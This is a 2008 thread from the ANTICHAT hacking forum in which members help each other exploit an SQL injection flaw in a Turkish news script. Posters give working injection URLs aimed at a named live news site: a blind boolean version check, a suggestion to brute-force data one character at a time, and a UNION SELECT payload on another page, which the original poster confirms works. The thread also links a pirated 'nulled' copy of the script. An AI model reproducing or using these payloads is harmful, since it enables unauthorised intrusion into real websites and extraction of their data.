sql injection is accepted but...

Discussion in 'Forum for discussion of ANTICHAT' started by aman12, 31 Mar 2008.

  1. aman12

    aman12 New Member

    Joined:
    28 Mar 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    this turkish news script accepts sql injection, but there are no results (i can not inject char). this is very important bug, because there are several thousand sites with this script!

    check it here:

    http://www.medyapolitik.com/tr/article_view.php?aid=1888-1

    is same result
    http://www.medyapolitik.com/tr/article_view.php?aid=1887

    you can download nulled script here
    http://rapidshare.com/files/33605976/internethaber.com.rar
     
    #1 aman12, 31 Mar 2008
    Last edited: 31 Mar 2008
  2. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    http://www.medyapolitik.com/tr/article_view.php?aid=1888+and+substring(version(),1,1)=5/*

    u can use subqueries with sql one char bruteforce, in fact the script probably selects one item from news that contents all the text and other info about it (there exist two or more queries for this parametr and they have different number of collumns) so u cant output the info directly
     
    #2 darky, 31 Mar 2008
    Last edited: 31 Mar 2008
    1 person likes this.
  3. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    If you are interested in this site, but it was not the script, that is the withdrawal of the injection
    Code:
    http://www.medyapolitik.com/tr/cats.php?catid=-10%20union%20select%201/*
    sorry for my english... translate.google.com)
     
  4. aman12

    aman12 New Member

    Joined:
    28 Mar 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    thank you very much it works :))))
     
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    You're welcome;)